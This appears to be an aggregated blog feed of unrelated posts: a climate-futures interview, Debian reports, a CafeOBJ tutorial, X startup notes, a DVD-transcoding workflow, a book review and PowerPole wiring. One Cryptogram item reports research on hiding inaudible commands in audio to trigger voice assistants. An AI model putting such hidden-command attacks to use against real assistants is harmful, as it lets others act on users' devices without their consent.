JOSÉ LUIS DE VICENTE: If we follow the Paris Agreement to its final consequences, what it’s saying is that, in order to prevent global temperature from rising from 3.6 to 4.8 median degrees Celsius by the end of the 21st century, we have to undertake the biggest transformation that we’ve ever done. And even doing that will mean that we’re only halfway to our goal of having global temperatures not rise more than 2 degrees, ideally 1.5, and we’re already at 1 degree. So that gives a sense of the challenge. And we need to do it for the benefit of the humans and non-humans of 02100, who don’t have a say in this conversation.

“Overview” by Benjamin Grant. Via CCCB.

There are two possibilities here: either we make the goals of the Paris Agreement—the bad news here being that this problem is much, much bigger than just replacing fossil fuels with renewable energies. The Tesla way of going at it, of replacing every car in the world with a Tesla—the numbers just don’t add up. We’re going to have to rethink most systems in society to make this a possibility. That’s possibility number one.

Possibility number two: if we don’t make the goals of the Paris Agreement, we know that there’s no chance that life in the end of the 21st century is going to look remotely similar to today. We know that the kind of systemic crises we have are way more serious than the ones that would allow essential normalcy as we understand it today. So whether we make the goals of the Paris Agreement or not, there is no way that life in the second part of the 21st century looks as it does today.

That’s why we open the exhibition with McKenzie Wark’s quote.

“This civilization is over. And everybody knows it.” — McKenzie Wark

This civilization is over, not in the apocalyptic sense that the end of the world is coming, but that the civilization we built from the mid-nineteenth century onward on this capacity of taking fossil fuels out of the Earth and turning that into a labor force and turning that into an equation of “growth equals development equals progress” is just not sustainable.

“Environmental Health Clinic” by Natalie Jeremijenko. Via CCCB.

So with all these reference points, the show asks: What does it mean to understand this story? What does it mean to be citizens acknowledging this reality? What are possible scenes that look at either aspects of the anthropocene planet today or possible post-Paris futures?

This show should mean different things for you whether you’re fifty-five or you’re twelve. Because if you’re fifty-five, these are all hypothetical scenarios for a world that you’re not going to see. But if you’re twelve this is the world that you’re going to grow up into.

02100 may seem very far away, but the people who will see the world of 02100 are already born.

AHMED KABIL: What role will technology play in our climate change future?

JOSÉ LUIS DE VICENTE: Technology will, of course, play a role, but I think we have to be non-utopian about what that role will be.

The climate crisis is not a technological or socio-cultural or political problem; it’s all three. So the problem can only be solved at the three axes. The one that I am less hopeful about is the political axis, because how do we do it? How do we break that cycle of incredibly short-term incentives built into the political power structure? How do we incorporate the idea of: “Okay, what you want as my constituent is not the most important thing in the world, so I cannot just give you what you want if you vote for me and my position of power.” Especially when we’re seeing the collapse of systems and mechanisms of political representation.

“Sea State 9: Proclamation” by Charles Lim. Via CCCB.

I want to believe—and I’m not a political scientist—that huge social transformations translate to political redesigns, in spite of everything. I’m not overly optimistic or utopian about where we are right now. But our capacity to coalesce and gather around powerful ideas that transmit very easily to the masses allows for shifts of paradigm better than previously. Not only good ones, but bad ones as well.

AHMED KABIL: Is there a case for optimism on climate change?

JOSÉ LUIS DE VICENTE: I cannot be optimistic looking at the data on the table and the political agendas, but I am in the sense of saying that incredible things are happening in the world. We’re witnessing a kind of political awakening. These huge social shifts can happen at any moment.

And I think, for instance, that the fossil fuel industry knows that it’s the end of the party. What we’re seeing now is their awareness that their business model is not going to be viable for much longer. And obviously neither Putin nor Trump are good news for the climate, but nevertheless these huge shifts are coming.

“Mitigation of Shock” by Superflux. Via CCCB.

Kim Stanley Robinson always mentions this “pessimism of the intellect, optimism of the will.” I think that’s where you need to be, knowing that big changes are possible. Of course, I have no utopian expectations about it—this is going to be the backstory for the rest of our lives and we’re going to have traumatic, sad things happening because they’re already happening. But I’m quite positive that the world will definitely not look like this one in many aspects, and many things that big social revolutions in the past tried to make possible will be made possible.

If this show has done anything I hope it’s made a small contribution in answering the question of how we think about the future of climate change, how we talk about it, and how we understand what it means. We have to exist on timescales more expansive than the tiny units of time of our lives. We have to think of the world in ways that are non-anthropocentric. We have to think that the needs and desires of the humans of now are not the only thing that matters. That’s a huge philosophical revolution. But I think it’s possible.


Notes

[1] The Long Now Foundation uses five digit dates to serve as a reminder of the time scale that we endeavor to work in. Since the Clock of the Long Now is meant to run well past the Gregorian year 10,000, the extra zero is to solve the deca-millennium bug which will come into effect in about 8,000 years.

Learn More

  • Stay updated on the After The End of The World exhibition.
  • Read The Guardian’s 02015 profile of Timothy Morton.
  • Watch Benjamin Grant’s upcoming Seminar About Long-Term Thinking, “Overview: Earth and Civilization in the Macroscope.”
  • Watch Kim Stanley Robinson’s 02016 talk at The Interval At Long Now on how climate will evolve government and society.
  • Read José Luis de Vicente’s interview with Kim Stanley Robinson.

Planet DebianRaphaël Hertzog: Freexian’s report about Debian Long Term Support, April 2018

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In March, about 183 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 5 hours (out of 10 hours allocated, thus keeping 5 extra hours for May).
  • Antoine Beaupré did 12h.
  • Ben Hutchings did 17 hours (out of 15h allocated + 2 remaining hours).
  • Brian May did 10 hours.
  • Chris Lamb did 16.25 hours.
  • Emilio Pozuelo Monfort did 11.5 hours (out of 16.25 hours allocated + 5 remaining hours, thus keeping 9.75 extra hours for May).
  • Holger Levsen did nothing (out of 16.25 hours allocated + 16.5 hours remaining, thus keeping 32.75 extra hours for May). He did not get hours allocated for May and is expected to catch up.
  • Hugo Lefeuvre did 20.5 hours (out of 16.25 hours allocated + 4.25 remaining hours).
  • Markus Koschany did 16.25 hours.
  • Ola Lundqvist did 11 hours (out of 14 hours allocated + 9.5 remaining hours, thus keeping 12.5 extra hours for May).
  • Roberto C. Sanchez did 7 hours (out of 16.25 hours allocated + 15.75 hours remaining, but immediately gave back the 25 remaining hours).
  • Santiago Ruano Rincón did 8 hours.
  • Thorsten Alteholz did 16.25 hours.

Evolution of the situation

The number of sponsored hours did not change. But a few sponsors interested in having more than 5 years of support should join LTS next month since this was a pre-requisite to benefit from extended LTS support. I did update Freexian’s website to show this as a benefit offered to LTS sponsors.

The security tracker currently lists 20 packages with a known CVE and the dla-needed.txt file 16. At two week from Wheezy’s end-of-life, the number of open issues is close to an historical low.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

Planet DebianNorbert Preining: Specification and Verification of Software with CafeOBJ – Part 3 – First steps with CafeOBJ

This blog continues Part 1 and Part 2 of our series on software specification and verification with CafeOBJ.

We will go through basic operations like starting and stopping the CafeOBJ interpreter, getting help, doing basic computations.

Starting and leaving the interpreter

If CafeOBJ is properly installed, a call to cafeobj will greet you with information about the current version of CafeOBJ, as well as build dates and which build system has been used. The following is what is shown on my Debian system with the latest version of CafeOBJ installed:

$ cafeobj
-- loading standard prelude

            -- CafeOBJ system Version 1.5.7(PigNose0.99) --
                   built: 2018 Feb 26 Mon 6:01:31 GMT
                         prelude file: std.bin
                                  ***
                      2018 Apr 19 Thu 2:20:40 GMT
                            Type ? for help
                                  ***
                  -- Containing PigNose Extensions --
                                  ---
                             built on SBCL
                             1.4.4.debian
CafeOBJ>

After the initial information there is the prompt CafeOBJ> indicating that the interpreter is ready to process your input. By default several files (the prelude as it is called above) is loaded, which defines certain basic sorts and operations.

If you have enough of playing around, simply press Ctrl-D (the Control key and d at the same time), or type in quit:

CafeOB> quit
$

Getting help

Besides the extensive documentation available at the website (reference manual, user manual, tutorials, etc), the reference manual is also always at your fingertips within the CafeOBJ interpreter using the ? group of commands:

  • ? – gives general help
  • ?com class – shows available commands classified by ‘class’
  • ? name – gives the reference manual entry for name
  • ?ex name – gives examples (if available) for name
  • ?ap name – (apropos) searches the reference manual for appearances of name

To give an example on the usage, let us search for the term operator and then look at the documentation concerning one of them:

CafeOBJ> ?ap op
Found the following matches:
 . `:theory  :  ->  { assoc | comm | id:  }`
...
 . `op  :  ->  {  }`
 . on-the-fly declaration
...

CafeOBJ> ? op
`op  :  ->  {  }`
Defines an operator by its domain, co-domain, and the term construct.
`` is a space separated list of sort names, `` is a
single sort name. 
...

I have shortened the output a bit indicated by ....

Simple computations

By default, CafeOBJ is just a barren landscape, meaning that there are now rules or axioms active. Everything is encapsulated into so called modules (which in mathematical terms are definitions of order-sorted algebras). One of these modules is NAT which allows computations in the natural numbers. To activate a module we use open:

CafeOBJ> open NAT .
...
%NAT>

The ... again indicate quite some output of the CafeOBJ interpreter loading additional files.

There are two things to note in the above:

  • One finishes a command with a literal dot . – this is necessary due to the complete free syntax of the CafeOBJ language and indicates the end of a statement, similar to semicolons in other programming languages.
  • The prompt has changed to NAT> to indicate that the playground (context) we are currently working are the natural numbers.

To actually carry out computations we use the command red or reduce. Recall from the previous post that the computational model of CafeOBJ is rewriting, and in this setting reduce means kicking of the rewrite process. Let us do this for a simple computation:

%NAT>; red 2 + 3 * 4 .
-- reduce in %NAT : (2 + (3 * 4)):NzNat
(14):NzNat
(0.0000 sec for parse, 0.0000 sec for 2 rewrites + 2 matches)

%NAT>

Things to note in the above output:

  • Correct operator precedence: CafeOBJ correctly computes 14 due to the proper use of operator precedence. If you want to override the parsing you can use additional parenthesis.
  • CafeOBJ even gives a sort (or type) information for the return value: (14):NzNat, indicating that the return value of 14 is of sort NzNat, which refers to non-zero natural numbers.
  • The interpreter tells you how much time it spent in parsing and rewriting.

If we have enough of this playground, we close the opened module with close which returns us to the original prompt:

%NAT> close .
CafeOBJ>

Now if you think this is not so interesting, let us to some more funny things, like computation with rational numbers, which are provided by CafeOBJ in the RAT module. Rational numbers can be written as slashed expressions: a / b. If we don’t want to actually reduce a given expression, we can use parse to tell CafeOBJ to parse the next expression and give us the parsed expression together with a sort:

CafeOBJ> open RAT .
...
%RAT> parse 3/4 .
(3/4):NzRat
%RAT>

Again, CafeOBJ correctly determined that the given value is a non-zero rational number. More complex expression can be parsed the same way, as well as reduced to minimal representation:

%RAT> parse 2 / ( 4 * 3 ) .
(2 / (4 * 3)):NzRat

%RAT> red 2 / ( 4 * 3 ) .
-- reduce in %RAT : (2 / (4 * 3)):NzRat
(1/6):NzRat
(0.0000 sec for parse, 0.0000 sec for 2 rewrites + 2 matches)

%RAT>

NAT and RAT are not the only built-in sorts, there are several more, and others can be defined easily (see next blog). The currently available data types, together with their sort order (recall that we are in order sorted algebras, so one sort can contain others):
NzNat < Nat < NzInt < Int < NzRat < Rat
which refer to non-zero natural numbers, natural numbers, non-zero integers, integers, non-zero rational numbers, rational numbers, respectively.

Then there are other data types unrelated (not ordered) to any other:
Triv, Bool, Float, Char, String, 2Tuple, 3Tuple, 4Tuple.

Functions

CafeOBJ does not have functions in the usual sense, but operators defined via there arity and a set of (rewriting) equations. Let us take a look at two simple functions in the natural numbers: square which takes one argument and returns the square of it, and a function sos which takes two arguments and returns the sum of squares of the arguments. In mathematical writing: square(a) = a * a and sos(a,b) = a*a + b*b.

This can be translated into CafeOBJ code as follows (from now on I will be leaving out the prompts):

open NAT .
vars A B : Nat
op square : Nat -> Nat .
eq square(A) = A * A .
op sos : Nat Nat -> Nat .
eq sos(A, B) = A * A + B * B .

This first declares two variables A and B to be of sort Nat (note that the module names and sort names are not the same, but the module names are usually the uppercase of the sort names). Then the operator square is introduced by providing its arity. In general an operator can have several input variables, and for each of them as well as the return value we have to provide the sorts:

  op  NAME : Sort1 Sort2 ... -> Sort

defines an operator NAME with several input parameters of the given sorts, and the return sort Sort.

The next line gives one (the only necessary) equation governing the computation rules of square. Equations are introduced by eq (and some variants of it), followed by an expression, and equal sign, and another expression. This indicates that CafeOBJ may rewrite the left expression to the right expression.

In our case we told CafeOBJ that it may rewrite an expression of the form square(A) to A * A, where A can be anything of sort Nat (for now we don't go into details how order-sorted rewriting works in general).

The next two lines do the same for the operator sos.

Having this code in place, we can easily do computations with it by using the already introduced reduce command:

red square(1) .
-- reduce in %NAT : (square(10)):Nat
(100):NzNat

red sos(10,20) .
-- reduce in %NAT : (f(10,20)):Nat
(500):NzNat

What to do if one equation does not service? Let us look at a typical recursive definition of sum of natural numbers: sum(0) = 0 and for a > 0 we have sum(a) = a + sum(a-1). This can be easily translated into CafeOBJ as follows:

open NAT .
op sum : Nat -> Nat .
eq sum(0) = 0 .
eq sum(A:NzNat) = A + sum(p A) .
red sum(10) .

where p (for predecessor) indicates the next smaller natural number. This operator is only defined on non-zero natural numbers, though.

In the above fragment we also see a new style of declaring variables, on the fly: The first occurrence of a variable in an equation can carry a sort declaration, which extends all through the equation.

Running the above code we get, not surprisingly 55, in particular:

-- reduce in %NAT : (sum(10)):Nat
(55):NzNat
(0.0000 sec for parse, 0.0000 sec for 31 rewrites + 41 matches)

As a challenge the reader might try to give definitions of the factorial function and the Fibonacci function, the next blog will present solutions for it.


This concludes the second part. In the next part we will look at defining modules (aka algebras aka theories) and use them to define lists.

Planet DebianEnrico Zini: Starting user software in X

There are currently many ways of starting software when a user session starts.

This is an attempt to collect a list of pointers to piece the big picture together. It's partial and some parts might be imprecise or incorrect, but it's a start, and I'm happy to keep it updated if I receive corrections.

x11-common

man xsession

  • Started by the display manager for example, /usr/share/lightdm/lightdm.conf.d/01_debian.conf or /etc/gdm3/Xsession
  • Debian specific
  • Runs scripts in /etc/X11/Xsession.d/
  • /etc/X11/Xsession.d/40x11-common_xsessionrc sources ~/.xsessionrc which can do little more than set env vars, because it is run at the beginning of X session startup
  • At the end, it starts the session manager (gnome-session, xfce4-session, and so on)

systemd --user

  • https://wiki.archlinux.org/index.php/Systemd/User
  • Started by pam_systemd, so it might not have a DISPLAY variable set in the environment yet
  • Manages units in:
    • /usr/lib/systemd/user/ where units provided by installed packages belong.
    • ~/.local/share/systemd/user/ where units of packages that have been installed in the home directory belong.
    • /etc/systemd/user/ where system-wide user units are placed by the system administrator.
    • ~/.config/systemd/user/ where the users put their own units.
  • A trick to start a systemd user unit when the X session has been set up and the DISPLAY variable is available, is to call systemctl start from a .desktop autostart file.

dbus activation

X session manager

xdg autostart

Other startup notes

~/.Xauthority

To connect to an X server, a client needs to send a token from ~/.Xauthority, which proves that they can read the user's provate data.

~/.Xauthority contains a token generated by display manager and communicated to X at startup.

To view its contents, use xauth -i -f ~/.Xauthority list

CryptogramSending Inaudible Commands to Voice Assistants

Researchers have demonstrated the ability to send inaudible commands to voice assistants like Alexa, Siri, and Google Assistant.

Over the last two years, researchers in China and the United States have begun demonstrating that they can send hidden commands that are undetectable to the human ear to Apple's Siri, Amazon's Alexa and Google's Assistant. Inside university labs, the researchers have been able to secretly activate the artificial intelligence systems on smartphones and smart speakers, making them dial phone numbers or open websites. In the wrong hands, the technology could be used to unlock doors, wire money or buy stuff online ­-- simply with music playing over the radio.

A group of students from University of California, Berkeley, and Georgetown University showed in 2016 that they could hide commands in white noise played over loudspeakers and through YouTube videos to get smart devices to turn on airplane mode or open a website.

This month, some of those Berkeley researchers published a research paper that went further, saying they could embed commands directly into recordings of music or spoken text. So while a human listener hears someone talking or an orchestra playing, Amazon's Echo speaker might hear an instruction to add something to your shopping list.

Worse Than FailureCodeSOD: A Bit Masked

The “for-case” or “loop-switch” anti-pattern creates some hard to maintain code. You know the drill: the first time through the loop, do one step, the next time through the loop, do a different step. It’s known as the “Anti-Duff’s Device”, which is a good contrast: Duff’s Device is a clever way to unroll a loop and turn it into a sequential process, while the “loop-switch” takes a sequential process and turns it into a loop.

Ashlea inherited an MFC application. It was worked on by a number of developers in Germany, some of which used English to name identifiers, some which used German, creating a new language called “Deunglish”. Or “Engleutch”? Whatever you call it, Ashlea has helpfully translated all the identifiers into English for us.

Buried deep in a thousand-line “do everything” method, there’s this block:

if(IS_SOMEFORMATNAME()) //Mantis 24426
{
  if(IS_CONDITION("RELEASE_4"))
  {
    m_BAR.m_TLC_FIELDS.DISTRIBUTIONCHANNEL="";
    CString strKey;
    for (unsigned int i=1; i<16; i++) // Test all combinations
    {
      strKey="#W#X#Y#Z";
      if(i & 1)
        strKey.Replace("#W", m_strActualPromo);  // MANTIS 45587: Search with and without promotion code
      if(i & 2)
        strKey.Replace("#X",m_BAR.m_TLC_FIELDS.OBJECTCODE);
      if(i & 4)
        strKey.Replace("#Y",TOKEN(strFoo,H_BAZCODE));
      if(i & 8)
        strKey.Replace("#Z",TOKEN(strFoo,H_CHAIN));

      strKey.Replace("#W","");
      strKey.Replace("#X","");
      strKey.Replace("#Y","");
      strKey.Replace("#Z","");

      if(m_lDistributionchannel.GetFirst(strKey))
      {
        m_BAR.m_TLC_FIELDS.DISTRIBUTIONCHANNEL="R";
        break;
      }
    }
  }
  else
    m_BAR.m_TLC_FIELDS.DISTRIBUTIONCHANNEL=m_lDistributionchannel.GetFirstLine(m_BAR.m_TLC_FIELDS.OBJECTCODE+m_strActualPromo);
}

Here, we see a rather unique approach to using a for-case- by using bitmasks to combine steps on each iteration of the loop. From what I can tell, they have four things which can combine to make an identifier, but might get combined in many different ways. So they try every possible combination, and if it exists, they can set the DISTRIBUTIONCHANNEL field.

That’s ugly and awful, and certainly a WTF, but honestly, that’s not what leapt out to me. It was this line:

if(IS_CONDITION("RELEASE_4"))

It’s quite clear that, as new versions of the software were released, they needed to control which features were enabled and which weren’t. This is probably related to a database, and thus the database may or may not be upgraded to the same release version as the code. So scattered throughtout the code are checks like this, which enable blocks of code at runtime based on which versions match with these flags.

Debugging that must be a joy.

[Advertisement] Forget logs. Next time you're struggling to replicate error, crash and performance issues in your apps - Think Raygun! Installs in minutes. Learn more.

Planet DebianWouter Verhelst: Digitizing my DVDs

I have a rather sizeable DVD collection. The database that I created of them a few years back after I'd had a few episodes where I accidentally bought the same movie more than once claims there's over 300 movies in the cabinet. Additionally, I own a number of TV shows on DVD, which, if you count individual disks, will probably end up being about the same number.

A few years ago, I decided that I was tired of walking to the DVD cabinet, taking out a disc, and placing it in the reader. That instead, I wanted to digitize them and use kodi to be able to watch a movie whenever I felt like it. So I made some calculations, and came up with a system with enough storage (on ZFS, of course) to store all the DVDs without needing to re-encode them.

I got started on ripping most of the DVDs using dvdbackup, but it quickly became apparent that I'd made a miscalculation; where I thought that most of the DVDs would be 4.7G ones, it turns out that most commercial DVDs are actually of the 9G type. Come to think of it, that does make a lot of sense. Additionally, now that I had a home server that had some significant reduntant storage, I found that I had some additional uses for such things. The storage that I had, vast enough though it may be, wouldn't suffice.

So, I gave this some more thought, but then life interfered and nothing happened for a few years.

Recently however, I've picked it up again, changing my workflow. I started using handbrake to re-encode the DVDs so they wouldn't take up quite so much space; having chosen VP9 as my preferred codec, I end up storing the DVDs as about 1 to 2 G per main feature, rather than the 8 to 9 that it used to be -- a significant gain. However, my first workflow wasn't very efficient; I would run the handbrake GUI from my laptop on ssh -X sessions to multiple machines, encoding the videos directly from DVD that way. That worked, but it meant I couldn't shut down my laptop to take it to work without interrupting work that was happening; also, it meant that if a DVD finished encoding in the middle of the night, I wouldn't be there to replace it, so the system would be sitting idle for several hours. Clearly some form of improvement was necessary if I was going to do this in any reasonable amount of time.

So after fooling around a bit, I came up with the following:

  • First, I use dvdbackup -M -r a to read the DVD without re-encoding anything. This can be done at the speed of the optical medium, and can therefore be done much more efficiently than to use handbrake directly from the DVD. The -M option tells dvdbackup to read everything from the DVD (to make a mirror of it, in effect). The -r a option tells dvdbackup to abort if it encounters a read error; I found that DVDs sometimes can be read successfully if I eject the drive and immediately reinsert it, or if I give the disk another clean, or even just try again in a different DVD reader. Sometimes the disk is just damaged, and then using dvdbackup's default mode of skipping the unreadable blocks makes sense, but not in a first attempt.
  • Then, I run a small little perl script that I wrote. It basically does two things:

    1. Run HandBrakeCLI -i <dvdbackup output> --previews 1 -t 0, parse its stderr output, and figure out what the first and the last titles on the DVD are.
    2. Run qsub -N <movie name> -v FILM=<dvdbackup output> -t <first title>-<last title> convert-film
  • The convert-film script is a bash script, which (in its first version) did this:

    mkdir -p "$OUTPUTDIR/$FILM/tmp"
    HandBrakeCLI -x "threads=1" --no-dvdnav -i "$INPUTDIR/$FILM" -e vp9 -E copy -T -t $SGE_TASK_ID --all-audio --all-subtitles -o "$OUTPUTDIR/$FILM/tmp/T${SGE_TASK_ID}.mkv"
    

    Essentially, that converts a single title to a VP9-encoded matroska file, with all the subtitles and audio streams intact, and forcing it to use only one thread -- having it use multiple threads is useful if you care about a single DVD converting as fast as possible, but I don't, and having four DVDs on a four-core system all convert at 100% CPU seems more efficient than having two convert at about 180% each. I did consider using HandBrakeCLI's options to only extract the "interesting" audio and subtitle tracks, but I prefer to not have dubbed audio (to have subtitled audio instead); since some of my DVDs are originally in non-English languages, doing so gets rather complex. The audio and subtitle tracks don't take up that much space, so I decided not to bother with that in the end.

The use of qsub, which submits the script into gridengine, allows me to hook up several encoder nodes (read: the server plus a few old laptops) to the same queue.

That went pretty well, until I wanted to figure out how far along something was going. HandBrakeCLI provides progress information on stderr, and I can just do a tail -f of the stderr output logs, but that really works well only for one one DVD at a time, not if you're trying to follow along with about a dozen of them.

So I made a database, and wrote another perl script. This latter will parse the stderr output of HandBrakeCLI, fish out the progress information, and put the completion percentage as well as the ETA time into a database. Then it became interesting:

CREATE OR REPLACE FUNCTION transjob_tcn() RETURNS trigger AS $$
BEGIN
  IF (TG_OP = 'INSERT') OR (TG_OP = 'UPDATE' AND (NEW.progress != OLD.progress) OR NEW.finished = TRUE) THEN
    PERFORM pg_notify('transjob', row_to_json(NEW)::varchar);
  END IF;
  RETURN NEW;
END;
$$ LANGUAGE plpgsql;
CREATE TRIGGER transjob_tcn_trigger
  AFTER INSERT OR UPDATE ON transjob
  FOR EACH ROW EXECUTE PROCEDURE transjob_tcn();

This uses PostgreSQL's asynchronous notification feature to send out a notification whenever an interesting change has happened to the table.

#!/usr/bin/perl -w

use strict;
use warnings;

use Mojolicious::Lite;
use Mojo::Pg;

...

helper dbh => sub { state $pg = Mojo::Pg->new->dsn("dbi:Pg:dbname=transcode"); };

websocket '/updates' => sub {
    my $c = shift;
    $c->inactivity_timeout(600);
    my $cb = $c->dbh->pubsub->listen(transjob => sub { $c->send(pop) });
    $c->on(finish => sub { shift->dbh->pubsub->unlisten(transjob => $cb) });
};

app->start;

This uses the Mojolicious framework and Mojo::Pg to send out the payload of the "transjob" notification (which we created with the FOR EACH ROW trigger inside PostgreSQL earlier, and which contains the JSON version of the table row) over a WebSocket. Then it's just a small matter of programming to write some javascript which dynamically updates the webpage whenever that happens, and Tadaa! I have an online overview of the videos that are transcoding, and how far along they are.

That only requires me to keep the queue non-empty, which I can easily do by running dvdbackup a few times in parallel every so often. That's a nice saturday afternoon project...

Planet DebianReproducible builds folks: Reproducible Builds: Weekly report #159

Here’s what happened in the Reproducible Builds effort between Sunday May 6 and Saturday May 12 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 94 was uploaded to Debian unstable and PyPI by Chris Lamb. It included contributions already convered by posts in previous weeks as well as new ones from:

Mattia Rizzolo subsequently backported this version to stretch.

After the release of version 94, the development continued with the following contributions from Mattia Rizzolo:

disorderfs development

Version 0.5.3-1 of disorderfs (our FUSE-based filesystem that introduces non-determinism) was uploaded to unstable by Chris Lamb. It included contributions already convered by posts in previous weeks as well as new ones from:

jenkins.debian.net development

Mattia Rizzolo made the following changes to our Jenkins-based testing framework, including:

Misc.

This week’s edition was written by Bernhard M. Wiedemann, Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Planet DebianRuss Allbery: Review: Thanks for the Feedback

Review: Thanks for the Feedback, by Douglas Stone & Sheila Heen

Publisher: Penguin
Copyright: 2014
Printing: 2015
ISBN: 1-101-61427-7
Format: Kindle
Pages: 322

Another book read for the work book club.

I was disappointed when this book was picked. I already read two excellent advice columns (Captain Awkward and Ask a Manager) and have read a lot on this general topic. Many workplace-oriented self-help books also seem to be full a style of pop psychology that irritates me rather than informs. But the point of a book club is that you read the book anyway, so I dove in. And was quite pleasantly surprised.

This book is about receiving feedback, not about giving feedback. There are tons of great books out there about how to give feedback, but, as the authors say in the introduction, almost no one giving you feedback is going to read any of them. It would be nice if we all got better at giving feedback, but it's not going to happen, and you can't control other people's feedback styles. You can control how you receive feedback, though, and there's quite a lot one can do on the receiving end. The footnoted subtitle summarizes the tone of the book: The Science and Art of Receiving Feedback Well (even when it is off base, unfair, poorly delivered, and, frankly, you're not in the mood).

The measure of a book like this for me is what I remember from it several weeks after reading it. Here, it was the separation of feedback into three distinct types: appreciation, coaching, and evaluation. Appreciation is gratitude and recognition for what one has accomplished, independent of any comparison against other people or an ideal for that person. Coaching is feedback aimed at improving one's performance. And evaluation, of course, is feedback that measures one against a standard, and usually comes with consequences (a raise, a positive review, a relationship break-up). We all need all three but different people need different mixes, sometimes quite dramatically so. And one of the major obstacles in the way of receiving feedback well is that they tend to come mixed or confused.

That framework makes it easier to see where one's reaction to feedback often goes off the rails. If you come into a conversation needing appreciation ("I've been working long hours to get this finished on time, and a little thanks would be nice"), but the other person is focused on an opportunity for coaching ("I can point out a few tricks and improvements that will let you not work as hard next time"), the resulting conversation rarely goes well. The person giving the coaching is baffled at the resistance to some simple advice on how to improve, and may even form a negative opinion of the other person's willingness to learn. And the person receiving the feedback comes away feeling unappreciated and used, and possibly fearful that their hard work is merely a sign of inadequate skills. There are numerous examples of similar mismatches.

I found this framing immediately useful, particularly in the confusion between coaching and evaluation. It's very easy to read any constructive advice as negative evaluation, particularly if one is already emotionally low. Having words to put to these types of feedback makes it easier to evaluate the situation intellectually rather than emotionally, and to explicitly ask for clarifying evaluation if coaching is raising those sorts of worries.

The other memorable concept I took away from this book is switchtracking. This is when the two people in a conversation are having separate arguments simultaneously, usually because each person has a different understanding of what the conversation is "really" about. Often this happens when the initial feedback sets off a trigger, particularly a relationship or identity trigger (other concepts from this book), in the person receiving it. The feedback giver may be trying to give constructive feedback on how to lay out a board presentation, but the receiver is hearing that they can't be trusted to talk to the board on their own. The receiver will tend to switch the conversation away to whether or not they can be trusted, quite likely confusing the initial feedback giver, or possibly even prompting another switchtrack into a third topic of whether they can receive criticism well.

Once you become aware of this tendency, you start to see it all over the place. It's sadly common. The advice in the book, which is accompanied with a lot of concrete examples, is to call this out explicitly, clearly separate and describe the topics, and then pick one to talk about first based on how urgent the topics are to both parties. Some of those conversations may still be difficult, but at least both parties are having the same conversation, rather than talking past each other.

Thanks for the Feedback fleshes out these ideas and a few others (such as individual emotional reaction patterns to criticism and triggers that interfere with one's ability to accept feedback) with a lot of specific scenarios. The examples are refreshingly short and to the point, avoiding a common trap of books like this to get bogged down into extended artificial dialogue. There's a bit of a work focus, since we get a lot of feedback at work, but there's nothing exclusively work-related about the advice here. Many of the examples are from personal relationships of other kinds. (I found an example of a father teaching his daughters to play baseball particularly memorable. One daughter takes this as coaching and the other as evaluation, resulting in drastically different reactions.) The authors combine matter-of-fact structured information with a gentle sense of humor and great pacing, making this surprisingly enjoyable to read.

I was feeling oversaturated with information on conversation styles and approaches and still came away from this book with some useful additional structure. If you're struggling with absorbing feedback or finding the right structure to use it constructively instead of getting angry, scared, or depressed, give this a try. It's much better than I had expected.

Rating: 7 out of 10

,

Planet DebianDaniel Pocock: A closer look at power and PowerPole

The crowdfunding campaign has so far raised enough money to buy a small lead-acid battery but hopefully with another four days to go before OSCAL we can reach the target of an AGM battery. In the interest of transparency, I will shortly publish a summary of the donations.

The campaign has been a great opportunity to publish some information that will hopefully help other people too. In particular, a lot of what I've written about power sources isn't just applicable for ham radio, it can be used for any demo or exhibit involving electronics or electrical parts like motors.

People have also asked various questions and so I've prepared some more details about PowerPoles today to help answer them.

OSCAL organizer urgently looking for an Apple MacBook PSU

In an unfortunate twist of fate while I've been blogging about power sources, one of the OSCAL organizers has a MacBook and the Apple-patented PSU conveniently failed just a few days before OSCAL. It is the 85W MagSafe 2 PSU and it is not easily found in Albania. If anybody can get one to me while I'm in Berlin at Kamailio World then I can take it to Tirana on Wednesday night. If you live near one of the other OSCAL speakers you could also send it with them.

If only Apple used PowerPole...

Why batteries?

The first question many people asked is why use batteries and not a power supply. There are two answers for this: portability and availability. Many hams like to operate their radios away from their home sometimes. At an event, you don't always know in advance whether you will be close to a mains power socket. Taking a battery eliminates that worry. Batteries also provide better availability in times of crisis: whenever there is a natural disaster, ham radio is often the first mode of communication to be re-established. Radio hams can operate their stations independently of the power grid.

Note that while the battery looks a lot like a car battery, it is actually a deep cycle battery, sometimes referred to as a leisure battery. This type of battery is often promoted for use in caravans and boats.

Why PowerPole?

Many amateur radio groups have already standardized on the use of PowerPole in recent years. The reason for having a standard is that people can share power sources or swap equipment around easily, especially in emergencies. The same logic applies when setting up a demo at an event where multiple volunteers might mix and match equipment at a booth.

WICEN, ARES / RACES and RAYNET-UK are some of the well known groups in the world of emergency communications and they all recommend PowerPole.

Sites like eBay and Amazon have many bulk packs of PowerPoles. Some are genuine, some are copies. In the UK, I've previously purchased PowerPole packs and accessories from sites like Torberry and Sotabeams.

The pen is mightier than the sword, but what about the crimper?

The PowerPole plugs for 15A, 30A and 45A are all interchangeable and they can all be crimped with a single tool. The official tool is quite expensive but there are many after-market alternatives like this one. It takes less than a minute to insert the terminal, insert the wire, crimp and make a secure connection.

Here are some packets of PowerPoles in every size:

Example cables

It is easy to make your own cables or to take any existing cables, cut the plugs off one end and put PowerPoles on them.

Here is a cable with banana plugs on one end and PowerPole on the other end. You can buy cables like this or if you already have cables with banana plugs on both ends, you can cut them in half and put PowerPoles on them. This can be a useful patch cable for connecting a desktop power supply to a PowerPole PDU:

Here is the Yaesu E-DC-20 cable used to power many mobile radios. It is designed for about 25A. The exposed copper section simply needs to be trimmed and then inserted into a PowerPole 30:

Many small devices have these round 2.1mm coaxial power sockets. It is easy to find a packet of the pigtails on eBay and attach PowerPoles to them (tip: buy the pack that includes both male and female connections for more versatility). It is essential to check that the devices are all rated for the same voltage: if your battery is 12V and you connect a 5V device, the device will probably be destroyed.

Distributing power between multiple devices

